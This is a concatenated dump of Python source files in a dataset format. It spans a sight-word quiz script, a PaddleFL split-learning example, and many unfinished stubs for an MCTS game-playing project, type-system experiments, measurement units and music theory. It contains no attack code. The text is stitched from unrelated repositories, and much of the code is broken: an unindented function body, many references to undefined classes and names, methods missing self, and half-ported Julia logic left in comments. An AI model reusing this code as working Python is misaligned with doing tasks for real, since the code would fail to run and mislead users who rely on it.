sight_list_5 = ['every', 'near', 'add', 'food', 'between', 'own', 'below', 'country', 'plant', 'last', 'school', 'father', 'keep', 'tree', 'never', 'start', 'city', 'earth', 'eye', 'light', 'thought', 'head', 'under', 'story', 'saw', 'left', 'don\'t', 'few', 'while', 'along', 'might', 'close', 'something', 'seem', 'next', 'hard', 'open', 'example', 'begin', 'life', 'always', 'those', 'both', 'paper', 'together', 'got', 'group', 'often', 'run', 'important']
sight_list_6 = ['until', 'children', 'side', 'feet', 'car', 'mile', 'night', 'walk', 'white', 'sea', 'began', 'grow', 'took', 'river', 'four', 'carry', 'state', 'once', 'book', 'hear', 'stop', 'without', 'second', 'late', 'miss', 'idea', 'enough', 'eat', 'face', 'watch', 'far', 'country', 'real', 'almost', 'let', 'above', 'girl', 'sometimes', 'mountain', 'cut', 'young', 'talk', 'soon', 'list', 'song', 'being', 'leave', 'family', 'it\'s', 'afternoon']
master = [sight_list_1, sight_list_2, sight_list_3, sight_list_4, sight_list_5, sight_list_6]
pick_word = ''
word = []
def word_choose(array, indexes, subindex1, subindex2):
"""Chooses a random word from pre-defined sight word lists, 6 lists in master list. Argument 'array' defaults to master, Arguments 'indexes, subindex1 and subindex2' are slices::: sub-list of master, then slices of the sub-list. """
word = array[indexes]
pick_word = random.choice(word[subindex1:subindex2])
return pick_word
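# Example: word_choose(master, 0, 0, 25) picks a random word from the first
# twenty-five entries of sight_list_1.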
def correct(word):
    """Remove a correctly answered word from whichever sight list contains it."""
    for sight_list in master:
        if word in sight_list:
            sight_list.remove(word)
```
|
{
"source": "JedHong/PaddleFL",
"score": 2
}
|
#### File: examples/mlp_example_dygraph/run_customer.py
```python
import paddle.fluid as fluid
import numpy as np
import yaml
import logging
from core.dygraph.layer_handler import CustomerLayerHandler, LayerBase
from core.dygraph import CustomerExecutor
import data_iter
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%Y-%m-%d %H:%M',
level=logging.DEBUG)
_LOGGER = logging.getLogger(__name__)
class MLPLayer(LayerBase):
"""
MLP: x -> emb -> pool -> fc1 -> fc2 -> label
host part: x -> emb -> pool -> fc1
customer part: fc1 -> fc2 -> label
"""
def __init__(self):
super(MLPLayer, self).__init__()
self.embed_dim = 11
self.fc2 = fluid.dygraph.nn.Linear(
input_dim=10,
output_dim=2,
act='softmax',
param_attr=fluid.ParamAttr(
initializer=fluid.initializer.ConstantInitializer(value=0.1)))
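        # Note: the host-side "fc1" activation passed to forward() must have
        # feature size 10 to match input_dim above; the batch dimension is free.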
def forward(self, inputs):
# return loss
self.predict = self.fc2(inputs["fc1"])
self.loss = fluid.layers.cross_entropy(self.predict, inputs["label"])
self.loss = fluid.layers.reduce_mean(self.loss)
return self.loss
def get_fetch_vars(self):
fetch_vars = {
"predict": self.predict
}
return fetch_vars
if __name__ == "__main__":
place = fluid.CPUPlace()
fluid.enable_imperative(place)
layer = MLPLayer()
optimizer = fluid.optimizer.SGDOptimizer(
learning_rate=0.01,
parameter_list=layer.parameters())
common_vars = {
"in": ["fc1"],
"out": ["fc1@GRAD"],
}
exe = CustomerExecutor(["0.0.0.0:7858"])
exe.load_layer_handler(layer, optimizer, common_vars)
for i, item in enumerate(data_iter.iter()):
_, label = item
label_var = fluid.dygraph.to_variable(label)
fetch_vars = exe.run(
usr_key=str(i),
feed={"label": label_var})
print("fetch_vars: {}".format(fetch_vars))
```
|
{
"source": "jedhsu/cortex",
"score": 2
}
|
#### File: mold/iterate/select.py
```python
import jax.numpy as jnp
from ._operator import Manipulation
__all__ = ["Select"]
class Select(
    Manipulation,
):
    # jnp.select is a function, not a class, so it cannot be subclassed;
    # hold it as the wrapped operator instead (the pattern BooleanAll uses)
    operator = jnp.select
def __init__(
self,
*args,
**kwargs,
):
super(Select, self).__init__(
*args,
**kwargs,
)
```
#### File: src/graph/move.py
```python
from .cell import Cell
from .index import IndexTensor
from .index import Test as IndexTensorTest
from .movement import MovementPath
from .shape import Shape
__all__ = ["Move"]
class Move(
IndexTensor,
):
def jump(
self,
*coordinate: int,
) -> Cell:
assert len([*coordinate]) == len(self._tensor._tensor.shape), ValueError
index = self.focus.index.add(
MovementPath.create(*coordinate),
shape=Shape(self._tensor._tensor.shape),
)
self.focused = self[index.coordinate]
return self[index.coordinate]
def step(
self,
dimension: int,
amount: int,
):
"""
Only move a single dimension.
"""
        movement = [0] * len(self._tensor._tensor.shape)
movement[dimension] = amount
return self.jump(*movement)
```
|
{
"source": "jedhsu/fractal",
"score": 2
}
|
#### File: brain/_op/weight.py
```python
from .._brain import Brain
from .parameters import Parameters
class MeanWeight(
Parameters,
Brain,
):
def mean_weight(self):
sw = sum(sum(abs(p)) for p in self.regularized_parameters())
sw = self.convert_output(sw)
return sw / self.number_of_regularized_parameters()
```
#### File: demon/basic/baseline.py
```python
# """
# Benchmark.MinMaxTS(;depth, τ=0.) <: Benchmark.Player
# Minmax baseline, which relies on [`MinMax.Player`](@ref).
# """
# @kwdef struct MinMaxTS <: Player
# depth :: Int
# amplify_rewards :: Bool
# τ :: Float64 = 0.
# end
# name(p::MinMaxTS) = "MinMax (depth $(p.depth))"
# def instantiate(p::MinMaxTS, ::AbstractGameSpec, nn)
# return MinMax.Player(
# depth=p.depth, amplify_rewards=p.amplify_rewards, τ=p.τ)
```
#### File: naive/_op/peer.py
```python
from .._demon import NaiveDemon
class Peer(NaiveDemon):
def think(
self,
mind: Mind,
):
actions = Spacetime.available_actions(game)
n = len(actions)
spectrum = ones(n) / len(actions)
return Place(
actions,
spectrum,
)
```
#### File: demon/_op/peer.py
```python
class Peer:
def peer(
self,
        topos,  # [TODO] annotate as Topos once it is defined/imported
        epoch: int,
    ):
        # [TODO] player, game, turn_number, actions, π, and Util are unresolved sketches
        fractum = player.glimpsing(game)
        energy = player.energy(game, turn_number)
demon = self.apply_energy()
return actions[Util.rand_categorical(π)]
```
#### File: demon/shrewd/demon.py
```python
# [TODO] port from Julia:
# module MCTS
# using Distributions: Categorical, Dirichlet
# using ..AlphaZero: GI, Util
#####
##### Standard Oracles
#####
"""
MCTS.RolloutOracle(game_spec::AbstractGameSpec, γ=1.) <: Function
This oracle estimates the value of a position by simulating a random game
from it (a rollout). Moreover, it puts a uniform prior on available actions.
Therefore, it can be used to implement the "vanilla" MCTS algorithm.
"""
class ShrewdDemon:  # [TODO] base on Physics once it is defined
    # [TODO] port the Julia fields/constructor:
    # gspec :: GameSpec
    # decay :: Float64
    # RolloutOracle(gspec, γ=1.) = new{typeof(gspec)}(gspec, γ)
    pass
# [TODO] port from Julia:
# function rollout!(game, γ=1.)
#     r = 0.
#     while !GI.game_terminated(game)
#         action = rand(GI.available_actions(game))
#         GI.play!(game, action)
#         r = γ * r + GI.white_reward(game)
#     end
#     return r
# end
# function (r::RolloutOracle)(state)
#     g = GI.init(r.gspec, state)
#     wp = GI.white_playing(g)
#     n = length(GI.available_actions(g))
#     P = ones(n) ./ n
#     wr = rollout!(g, r.gamma)
#     V = wp ? wr : -wr
#     return P, V
# end
#####
##### AlphaZero Parameters
#####
"""
Parameters of an MCTS player.
| Parameter | Type | Default |
|:-----------------------|:-----------------------------|:--------------------|
| `num_iters_per_turn` | `Int` | - |
| `gamma` | `Float64` | `1.` |
| `cpuct` | `Float64` | `1.` |
| `temperature` | `AbstractSchedule{Float64}` | `ConstSchedule(1.)` |
| `dirichlet_noise_ϵ` | `Float64` | - |
| `dirichlet_noise_α` | `Float64` | - |
| `prior_temperature` | `Float64` | `1.` |
# Explanation
An MCTS player picks an action as follows. Given a game state, it launches
`num_iters_per_turn` MCTS iterations, with UCT exploration constant `cpuct`.
Rewards are discounted using the `gamma` factor.
Then, an action is picked according to the distribution ``π`` where
``π_i ∝ n_i^{1/τ}`` with ``n_i`` the number of times that the ``i^{\\text{th}}``
action was visited and ``τ`` the `temperature` parameter.
It is typical to use a high value of the temperature parameter ``τ``
during the first moves of a game to increase exploration and then switch to
a small value. Therefore, `temperature` is an [`AbstractSchedule`](@ref).
For information on parameters `cpuct`, `dirichlet_noise_ϵ`,
`dirichlet_noise_α` and `prior_temperature`, see [`MCTS.Env`](@ref).
# AlphaGo Zero Parameters
In the original AlphaGo Zero paper:
+ The discount factor `gamma` is set to 1.
+ The number of MCTS iterations per move is 1600, which
corresponds to 0.4s of computation time.
+ The temperature is set to 1 for the 30 first moves and then to an
infinitesimal value.
+ The ``ϵ`` parameter for the Dirichlet noise is set to ``0.25`` and
the ``α`` parameter to ``0.03``, which is consistent with the heuristic
of using ``α = 10/n`` with ``n`` the maximum number of possibles moves,
which is ``19 × 19 + 1 = 362`` in the case of Go.
"""
# [TODO] port from Julia:
# @kwdef struct MctsParams
#     gamma :: Float64 = 1.
#     cpuct :: Float64 = 1.
#     num_iters_per_turn :: Int
#     temperature :: AbstractSchedule{Float64} = ConstSchedule(1.)
#     dirichlet_noise_ϵ :: Float64
#     dirichlet_noise_α :: Float64
#     prior_temperature :: Float64 = 1.
# end
"""
SamplesWeighingPolicy
During self-play, early board positions are possibly encountered many
times across several games. The corresponding samples can be merged
together and given a weight ``W`` that is a nondecreasing function of the
number ``n`` of merged samples:
- `CONSTANT_WEIGHT`: ``W(n) = 1``
- `LOG_WEIGHT`: ``W(n) = \\log_2(n) + 1``
- `LINEAR_WEIGHT`: ``W(n) = n``
"""
# [TODO] port from Julia:
# @enum SamplesWeighingPolicy CONSTANT_WEIGHT LOG_WEIGHT LINEAR_WEIGHT
```
#### File: _evolving/_op/streaming.py
```python
from typing import Iterator
from .._evolving import Evolving
class Streaming(Evolving, Iterator):  # [TODO] parametrize as Iterator[Batch] once Batch exists
    def batches_iterator(self):
        # [TODO] port from Julia:
        # batchsize = min(params.batch_size, length(W))
        # batches = Flux.Data.DataLoader(data; batchsize, partial=false, shuffle=true,)
        # batches_stream = map(batches) do b
        #     Network.convert_input_tuple(network, b)
        # end |> Util.cycle_iterator |> Iterators.Stateful
        # return new(network, samples, params, data, Wmean, Hp, batches_stream)
        raise NotImplementedError
```
#### File: _op/_evolve/evolved.py
```python
from dataclasses import dataclass
from .optimized import Optimized
@dataclass
class Evolved(
Optimized,
):
demon_entropy: float
brain_entropy: float
def evolution_status(
    tr,  # [TODO] annotate as Trainer once it is defined/imported
    samples,
):
    pass
```
#### File: glimpse/_op/compute.py
```python
from ..glimpsing import Glimpsing
from math import sqrt
from .._state import GlimpsedWorldState
class Compute(
Glimpsing,
):
@staticmethod
def upper_confidence_bounds(
glimpsed_state: GlimpsedWorldState,
cpuct,
epsilon,
eta,
):
assert epsilon == 0 or len(eta) == len(glimpsed_state.actions)
sqrt_num_visited = sqrt(glimpsed_state.num_visited)
        scores = []
        for i, action in enumerate(glimpsed_state.actions):
            qvalue = action.energy / max(action.num_visited, 1)
            if epsilon == 0:
                probability = action.prior_probability
            else:
                # [TODO] clean me functionally
                probability = (1 - epsilon) * action.prior_probability + epsilon * eta[
                    i
                ]
            # PUCT score: mean value plus an exploration bonus scaled by the prior
            scores.append(
                qvalue + cpuct * probability * sqrt_num_visited / (action.num_visited + 1)
            )
        return scores
def depth_of_analysis(self) -> float:
"""
Return the average number of nodes that are traversed during an
MCTS simulation, not counting the root.
"""
if self.total_simulations == 0:
return 0
return self.total_nodes_traversed / self.total_simulations
```
#### File: glimpse/_op/update.py
```python
from ..glimpsing import Glimpsing
from fractal.world import WorldState
class Update(
Glimpsing,
):
def update_world_state(
self,
worldstate: WorldState,
        action,  # [TODO] annotate as Action once defined
        energy,  # [TODO] annotate as Energy once defined
    ):
        # assumption: `action` keys the stats table and `energy` is the backed-up value
        stats = self.tree[worldstate].stats  # [TODO] confirm where the search tree lives
        astats = stats[action]
        stats[action] = PlacementAnalysis(  # [TODO] import PlacementAnalysis
            astats.P,
            astats.W + energy,
            astats.N + 1,
        )
```
#### File: bicameral/_op/duel.py
```python
from dataclasses import dataclass
from typing import Optional
f64 = float
@dataclass
class Dueled:
legend: str
avgr: f64
redundancy: f64
    rewards: list[f64]
    baseline_rewards: Optional[list[f64]]
time: f64
"""
# Two-player Games
- `rewards` is the sequence of rewards collected by the evaluated player
- `avgr` is the average reward collected by the evaluated player
- `baseline_rewards` is `nothing`
# Single-player Games
- `rewards` is the sequence of rewards collected by the evaluated player
- `baseline_rewards` is the sequence of rewards collected by the baseline player
- `avgr` is equal to `mean(rewards) - mean(baseline_rewards)`
# Common Fields
- `legend` is a string describing the evaluation
- `redundancy` is the ratio of duplicate positions encountered during the
evaluation, not counting the initial position. If this number is too high,
you may want to increase the move selection temperature.
- `time` is the computing time spent running the evaluation, in seconds
"""
class Debate:
def debate(
cls,
physics: Physics,
contender: Cortex,
baseline: Cortex,
params,
handler,
):
        make_oracles = (
            contender.clone(on_gpu=params.sim.use_gpu, test_mode=True),
            baseline.clone(on_gpu=params.sim.use_gpu, test_mode=True),
        )
        simulator = Glimpsing(make_oracles, record_trace)  # [TODO] record_trace is undefined here
# white = Cortex(gspec, oracles[1], params.mcts)
# black = Cortex(gspec, oracles[2], params.mcts)
# return Bicortex(white, black)
# def game_simulated():
# return Handlers.checkpoint_game_played(handler)
# samples = simulate( simulator, gspec, params.sim,
# return rewards_and_redundancy(samples, gamma=params.mcts.gamma)
# # Compare two versions of a neural network (params::ArenaParams)
# # Works for both two-player and single-player games
# def converse(physics: Physics, left: Cortex, right: Cortex, params, handler,):
# legend = "Most recent NN versus best NN so far"
# if Flow.two_players(gspec):
# (rewards_c, red), t = pit_networks(gspec, contender, baseline, params, handler,)
# avgr = mean(rewards_c)
# rewards_b = nothing
# else:
# (rewards_c, red_c), tc = cortex.evaluate(gspec, contender, params, handler,)
# (rewards_b, red_b), tb = cortex.evaluate(gspec, baseline, params, handler,)
# avgr = mean(rewards_c) - mean(rewards_b)
# red = mean([red_c, red_b])
# t = tc + tb
# return Evaluated(legend, avgr, red, rewards_c, rewards_b, t,)
```
#### File: bicameral/_op/ear.py
```python
class Ear:  # [TODO] mix in Mind once it is defined/imported
def launch_inference_server(
cortex1: Cortex,
cortex2: Cortex,
num_workers: int,
batch_size: int,
fill_batches: int,
):
pass
```
#### File: imagine/_op/imagine.py
```python
from typing import Callable
from fractal.world import World
from .._imagining import Imagining
from ..multiprocessing import Multiprocessing
class Imagine(
Imagining,
):
def imagine(
self,
world: World,
multiprocessing: Multiprocessing,
on_imagined: Callable,
):
"""
This is simulate.
"""
def imagine_parallely(
self,
world: World,
multiprocessing: Multiprocessing,
on_imagined: Callable,
):
"""
This is distributed simulate.
"""
pass
```
#### File: mind/_op/reset.py
```python
from .._demon import Demon
class Go(
Demon,
):
def reincarnate(self):
pass
```
#### File: mind/_op/stream.py
```python
from typing import Iterator
def mind_stream() -> Iterator:  # [TODO] parametrize as Iterator[Batch] once Batch exists
    # [TODO] port from Julia (the original used Flux.Data.DataLoader):
    # batchsize = min(params.batch_size, length(W))
    # batches = Flux.Data.DataLoader(data, batchsize, partial=false, shuffle=true)
    # return map(batches, b)
    raise NotImplementedError
```
#### File: mind/_processing/recalled.py
```python
class Recall:
@classmethod
def recalling(
cls,
        brain,  # [TODO] annotate as Brain once imported
        evolve,  # [TODO] annotate as Evolve once imported
        analysis,  # [TODO] annotate as Analysis once imported
    ):
        # It is important to load the neural network in test mode so as to not
        # overwrite the batch norm statistics based on biased data.
        # [TODO] port from Julia:
        # Tr(samples) = Evolve.evolving(mem.gspec, nn, samples, learning_params, test_mode=true)
        # all_samples = samples_report(Tr(get_experience(mem)))
        # latest_batch = isempty(last_batch(mem)) ?
        #     all_samples :
        #     samples_report(Tr(last_batch(mem)))
        # def recalling_stage():
        #     es = get_experience(mem)
        #     sort!(es, by=(e->e.t))
        #     csize = ceil(Int, length(es) / params.num_game_stages)
        #     stages = collect(Iterators.partition(es, csize))
        #     map(stages) do es
        #         ts = [e.t for e in es]
        #         stats = samples_report(Tr(es))
        #         Report.StageSamples(minimum(ts), maximum(ts), stats)
        # return cls(latest_batch, all_samples, per_game_stage)
        raise NotImplementedError
```
#### File: _flow/_op/construct.py
```python
# [TODO] port from Julia:
# function GI.init(spec::Spec)
#     env = GI.clone(spec.env)
#     RL.reset!(env.rlenv)
#     return env
# end
# function GI.init(spec::Spec, state)
#     env = GI.clone(spec.env)
#     RL.setstate!(env.rlenv, state)
#     return env
# end
```
#### File: _flow/_op/flow.py
```python
class Flow:
    def flow(self, place):
        # [TODO] ported sketch of the Julia `function GI.play!(env::Env, action)`
        r = self.observe(place)
        self.last_reward = r
        return r
```
#### File: placement/_op/initialize.py
```python
class PlacementAnalysis:
pass
# def initialize(
# spacetime: Spacetime,
# placing: Place,
# ):
# if placing in spacetime.tree:
# return (env.tree[state], false)
# else:
# (P, V) = env.oracle(state)
# info = init_state_info(P, V, env.prior_temperature)
# env.tree[state] = info
# return (info, true)
```
#### File: placement/_op/present.py
```python
def now():
eps = 1e-16
dummy_loss = Time.Loss(
0,
0,
0,
0,
0,
)
dummy_status = Report.LearningStatus(
dummy_loss,
0,
0,
)
return Now.Learning(
eps,
eps,
eps,
eps,
dummy_status,
[],
[],
        False,
)
```
#### File: quantum/action/_probability.py
```python
class QuantumProbability(
int,
):
def __init__(
self,
probability: int,
):
super().__new__(
int,
probability,
)
```
#### File: fractum/quantum/_state.py
```python
from abc import ABCMeta
class QuantumStateMeta(ABCMeta):
    # a metaclass must derive from type (here via the imported ABCMeta);
    # __getattr__, unlike __getattribute__, lets explicitly defined states resolve normally
    def __getattr__(cls, attr: str):
        # [TODO] QuantumState subclasses int, so a name-to-value lookup is still needed here
        return QuantumState(attr)
class QuantumState(
int,
metaclass=QuantumStateMeta,
):
pass
class Test:
class TicTacToe_QuantumState(
QuantumState,
):
Empty = 0
White = 1
Black = 2
```
#### File: _op/end/ending.py
```python
from typing import Callable
from dataclasses import dataclass
@dataclass
class WorldEnded(World):
name: str
condition: Callable[..., bool]
end_state: EndState
def states(self):
pass
def tictactoe_no_more_spaces(self):
        return all(block.state != TicTacToe_Block.Empty for block in self.blocks)
def tictactoe_white_won(self):
return any(self.three_in_a_row().all_white())
def tictactoe_black_won(self):
return any(self.three_in_a_row().all_black())
TicTacToe_Full = WorldEnded(
    "No more spaces.",
    WorldEnded.tictactoe_no_more_spaces,
    TicTacToe_EndState.Draw,
)
```
#### File: world/_op/initialize.py
```python
from copy import deepcopy
from .._world import World
from ..nature import Nature
class Initialize(World,):
@classmethod
def initialize(cls, nature: Nature):
        env = deepcopy(nature)
        # [TODO] port from Julia: RL.reset!(env.rlenv)
        return env
# function GI.init(spec::Spec, state)
# env = GI.clone(spec.env)
# RL.setstate!(env.rlenv, state)
# return env
# end
```
#### File: world/_op/perturb.py
```python
import numpy as np
def sample_dirichlet_noise(
    spacetime,  # [TODO] annotate as Spacetime once it is defined
    alpha,
):
    placements = spacetime.available_placements()
    n = len(placements)
    # numpy's sampler stands in here for the Julia-style rand(Dirichlet(n, alpha))
    return np.random.dirichlet([alpha] * n)
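# Usage sketch (hypothetical spacetime exposing three available placements):
#     eta = sample_dirichlet_noise(spacetime, alpha=0.03)
# eta sums to 1 and is mixed into the priors as
# (1 - epsilon) * prior + epsilon * eta (see glimpse/_op/compute.py above).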
```
#### File: _realizing/_op/actions.py
```python
from ..realizing import Realizing
class Actions(
Realizing,
):
def available_actions(self):
pass
```
#### File: _realizing/_op/state.py
```python
from abc import abstractmethod
from .._world import World
class State(
World,
):
@abstractmethod
def read_state(self):
"""
Read a state from stdin.
"""
pass
@abstractmethod
def print_state(self):
"""
Write a state to stdout.
"""
pass
```
#### File: fractal/world/_statics.py
```python
from abc import ABCMeta
from abc import abstractmethod
class AbstractStatics(
metaclass=ABCMeta,
):
    @classmethod
    @abstractmethod
    def initial_time(cls) -> "WorldTime":  # [TODO] WorldTime still needs importing
        pass
    @classmethod
    @abstractmethod
    def initial_position(cls) -> "WorldPosition":  # [TODO] WorldPosition still needs importing
        pass
    @classmethod
    def initial_worldstate(cls) -> "WorldState":  # [TODO] WorldState still needs importing
        raise NotImplementedError
    @classmethod
    @abstractmethod
    def has_world_ended(cls) -> bool:
        raise NotImplementedError
```
|
{
"source": "jedhsu/language",
"score": 2
}
|
#### File: category/__collection/collection.py
```python
from typing import Any
__all__ = ["AbstractCollection"]
class AbstractCollection:
# specifies the contained type of this collection
type: Any
@classmethod
def __class_getitem__(cls, item):
pass
        # [TODO] finish this
```
#### File: grammar/lex/_.py
```python
from types import CodeType as Code
def construct():
...
def create() -> object:  # [TODO] swap in a dedicated Object type if one is defined
...
def define() -> Code:
...
```
#### File: term/_tests/test__init.py
```python
from ..form import Form, Term
def test_behavior():
assert type(Term) == Form, type(Term)
assert issubclass(Term, Form)
class TestTerm:
pass
# class TestForm:
# def test_parents(self):
# assert Form.__bases__ is None, Form.__bases__
```
#### File: syntax/_tests/test_symbol.py
```python
from ..symbol import Symbol
class TestSymbol:
def test_init(self):
a = Symbol("a")
assert a == "a"
assert isinstance(a, str)
assert isinstance(a, Symbol)
```
#### File: type/typing/bound.py
```python
from typing import Type as _Type
from typing import Generic
from typing import TypeVar
from ..operation import Operation
# [TODO] figure out the metaclass hacking later, spec the logic first with an encapsulated type
class Equivalence:
_type: type
def __eq__(self, t: type):
return self._type == t
# define a relation on types
# can make relation itself generic later
# need BinaryComparisonOperation
T = TypeVar("T")
class TypeRelation(Generic[T], Operation.Binary):
    def __call__(self):
        pass
# [TODO] glue above and bottom
def subtype_of(t1: type, t2: type) -> bool:
    # minimal nominal check; a structural relation can replace this later
    return issubclass(t1, t2)
class Type(Equivalence):  # [TODO] also base on PartialOrder once it is defined
    _type: type
```
#### File: symbol/tests/test_symbol.py
```python
from ..symbol import Symbol
class TestSymbol:
def test_init(self):
A = Symbol("A")
assert isinstance(A, Symbol)
class TestDefault:
def test_A(self):
A = Symbol.A()
assert A == Symbol("A")
class TestCompose:
def test_add(self):
assert Symbol("A") + Symbol("B") == Symbol("AB")
class TestDisplay:
def test_repr(self):
assert repr(Symbol("A")) == "A"
```
|
{
"source": "jedhsu/measure",
"score": 3
}
|
#### File: graphical/distance/pixel.py
```python
from abc import ABCMeta
from wich.measure.unit import UnitDistance
from wich.literal.integer import Integer
from ._distance import GraphicalDistance
__all__ = [
"Pixel",
]
class Pixel(
Integer,
GraphicalDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
int: int,
):
        super(Pixel, self).__init__(
int,
)
```
#### File: graphical/distance/typepoint.py
```python
from abc import ABCMeta
from wich.measure.unit import UnitDistance
from wich.measure.fractional import Quarter
from ._distance import GraphicalDistance
__all__ = [
"Typepoint",
]
class Typepoint(
Quarter,
GraphicalDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
int: int,
):
super(Typepoint, self).__init__(
int,
)
```
#### File: distance/metric/millimeter.py
```python
from abc import ABCMeta
from ..._unit import UnitDistance
from ._distance import MetricDistance
from wich.literal.float_ import Float
__all__ = [
"Millimeter",
]
class Millimeter(
Float,
MetricDistance,
UnitDistance,
):
__metaclass__ = ABCMeta
def __init__(
self,
float: float,
):
super(Millimeter, self).__init__(
float,
)
```
#### File: rotational/angle/degrees.py
```python
from abc import ABCMeta
from wich.literal.float_ import Float
from wich.measure.unit import UnitAngle
from ._angle import Angle
__all__ = [
"Degrees",
]
class Degrees(
Float,
Angle,
UnitAngle,
):
__metaclass__ = ABCMeta
def __init__(
self,
float: float,
):
super(Degrees, self).__init__(
float,
)
```
#### File: measure/rotational/rotation.py
```python
from ..count import Count
from ._rotational import RotationalMeasure
__all__ = [
"Rotation",
]
class Rotation(
Count,
RotationalMeasure,
):
def __init__(
self,
count: int,
):
super(Rotation, self).__init__(
count,
)
```
|
{
"source": "jedhsu/music",
"score": 3
}
|
#### File: class_/audioa/display.py
```python
def format_accidental(accidental: str) -> str:
if accidental == "s":
return "\u266f"
elif accidental == "f":
return "\u266d"
else:
raise KeyError("Not an accidental.")
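# Examples: format_accidental("s") -> "♯" (U+266F), format_accidental("f") -> "♭" (U+266D).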
class _Display_(_Key):
def __repr__(self):
keyname = self._key.name
keyname = keyname.replace("s", format_accidental("s"))
keyname = keyname.replace("s", format_accidental("s"))
return keyname
```
#### File: class_/time/atom.py
```python
from dataclasses import dataclass
from typing import Sequence
from ._space import Space
from .quark import Quark
__all__ = ["Atom"]
@dataclass
class Atom(
tuple[Quark],
Space,
):
index: int
def __init__(
self,
beats: Sequence[Quark],
index: int,
):
assert index > 0, "Index must be positive"
self.index = index
super(Atom, self).__new__(
tuple,
beats,
)
def __repr__(self) -> str:
return f"Atom-{self.index}"
```
#### File: time/bar/_bar.py
```python
from dataclasses import dataclass
from typing import Sequence
from .._space import Space
from ..beat import Beat
__all__ = ["Bar"]
@dataclass
class Bar(
tuple[Beat],
Space,
):
index: int
def __init__(
self,
beats: Sequence[Beat],
index: int,
):
self.index = index
assert 1 <= index <= 4, "Not a valid index."
assert len(beats) == 4, "Must have four beats in a bar."
super(Bar, self).__new__(
tuple,
beats,
)
def __repr__(self) -> str:
return f"Bar-{self.index}"
```
#### File: class_/time/beat.py
```python
from dataclasses import dataclass
from typing import Sequence
from ._space import Space
from .step import Step
__all__ = ["Beat"]
@dataclass
class Beat(
tuple[Step],
Space,
):
index: int
def __init__(
self,
steps: Sequence[Step],
index: int,
):
self.index = index
assert 1 <= index <= 4, "Not a valid index."
assert len(steps) == 4, "Must have four steps in a beat."
super(Beat, self).__new__(
tuple,
steps,
)
def __repr__(self) -> str:
return f"Beat-{self.index}"
```
#### File: music/distance/_arithmetic.py
```python
from ._interval import Interval
__all__ = ["IntervalArithmetic"]
class IntervalArithmetic(
Interval,
):
def __add__(
self,
it: Interval,
) -> Interval:
return Interval(self.steps + it.steps)
def __sub__(
self,
it: Interval,
) -> Interval:
return Interval(self.steps - it.steps)
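# Worked example, assuming `steps` counts semitones: Interval(4) + Interval(3)
# == Interval(7), i.e. a major third plus a minor third spans a perfect fifth.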
```
#### File: aural/cent/_cent.py
```python
from .._interval import Interval
__all__ = ["Cent"]
class Cent(
int,
Interval,
):
def __init__(
self,
val: int,
):
super(Cent, self).__new__(
int,
val,
)
```
#### File: distance/aural/_interval.py
```python
from __future__ import annotations
from dataclasses import dataclass
from enum import Enum
from fractions import Fraction
from ._ratio import FrequencyRatio
__all__ = ["Interval"]
class AudioInterval:
pass
# class _IntervalEnum(
# Enum,
# ):
# O = 0
# m2 = 1
# M2 = 2
# m3 = 3
# M3 = 4
# P4 = 5
# m5 = 6
# P5 = 7
# m6 = 8
# M6 = 9
# m7 = 10
# M7 = 11
# @dataclass
# class _Interval:
# # TODO: switch to semitone repr
# interval: _IntervalEnum
# octaves: int
# class _Interval_(
# _Interval,
# ):
# def semitones(self) -> int:
# """ Number of semitones. """
# return 12 * self.octaves + self.interval.value
# # TODO: make perfect
# def ratio(self) -> float:
# """
# Ratio of the interval's frequency??
# """
# return 2 ** Fraction(self.semitones(), 12)
# def purity(self) -> int:
# ...
# class Interval(NamedTuple):
# bot: Frequency
# top: Frequency
# @property
# def consonance(self):
# raise NotImplementedError
# @staticmethod
# def just_intonation():
# raise NotImplementedError
# class Interval(
# _Display_,
# _Interval_,
# _Interval,
# ):
# def __init__(
# self,
# interval: _IntervalEnum,
# octaves: int,
# ):
# super().__init__(interval, octaves)
# @staticmethod
# def from_semitones(semitones: int):
# octaves, step = divmod(semitones, 12)
# return Interval(_IntervalEnum(step), octaves)
# def __add__(self, i: Interval) -> Interval:
# return add(self, i)
# def add(i1: Interval, i2: Interval) -> Interval:
# semitones = i1.semitones() + i2.semitones()
# return Interval.from_semitones(semitones)
# m2 = Interval.from_semitones(1)
# M2 = Interval.from_semitones(2)
# m3 = Interval.from_semitones(3)
# M3 = Interval.from_semitones(4)
# P4 = Interval.from_semitones(5)
# m5 = Interval.from_semitones(6)
# P5 = Interval.from_semitones(7)
```
#### File: a/shp/as0.py
```python
from fivear.musical.key import ASharp
from ..._pitch import Pitch
__all__ = ["As0"]
class As0(
Pitch,
):
def __init__(
self,
cents: Cent,
):
# super(As0, self).__init__()...
pass
```
#### File: integer/audio/display.py
```python
from ._pitch import Pitch
__all__ = ["Display"]
class Display(
Pitch,
):
def __repr__(self):
return f"{self.key}{self.level}"
```
#### File: amplitude/convert/from_.py
```python
from ...decibel._decibel import Decibel
from ...power._power import Power
from .._amplitude import Amplitude
__all__ = ["From"]
class From:
@staticmethod
def from_decibel(db: Decibel) -> Amplitude:
return Amplitude(10.0 ** (db / 20))
@staticmethod
def from_power(pow: Power) -> Amplitude:
return Amplitude(10.0 ** (pow / 10))
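    # Worked examples: from_decibel(Decibel(-20)) == Amplitude(0.1), since
    # 10 ** (-20 / 20) == 0.1; from_power(Power(-10)) == Amplitude(0.1), since
    # 10 ** (-10 / 10) == 0.1.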
```
#### File: convert/_test/test_from_.py
```python
from pytest import approx
from ..from_ import Decibel
from ..from_ import Power
from ..from_ import Amplitude
from ..from_ import From
class TestAmplitudeFrom:
def test_from_decibel(self):
db = Decibel(-10)
assert From.from_decibel(db) == approx(0.3162276)
assert From.from_decibel(db) == approx(Amplitude(0.3162276))
def test_from_power(self):
pow = Power(-10)
assert From.from_power(pow) == approx(0.1)
        assert From.from_power(pow) == approx(Amplitude(0.1))
```
#### File: convert/_test/test_into_.py
```python
from pytest import approx
from ..into_ import Decibel
from ..into_ import Power
from ..into_ import Into
class TestAmplitudeInto:
def test_into_decibel(self):
ampl = Into(0.1)
assert ampl.into_decibel() == approx(-20)
assert ampl.into_decibel() == approx(Decibel(-20))
def test_into_power(self):
ampl = Into(0.1)
assert ampl.into_power() == approx(-10)
assert ampl.into_power() == approx(Power(-10))
# def test_into_phon(self):
# pass
```
#### File: volume/phon/_phon.py
```python
__all__ = ["Phon"]
class Phon(float):
def __init__(self, value: float):
"""Wraps immutable float."""
super(Phon, self).__new__(float, value)
```
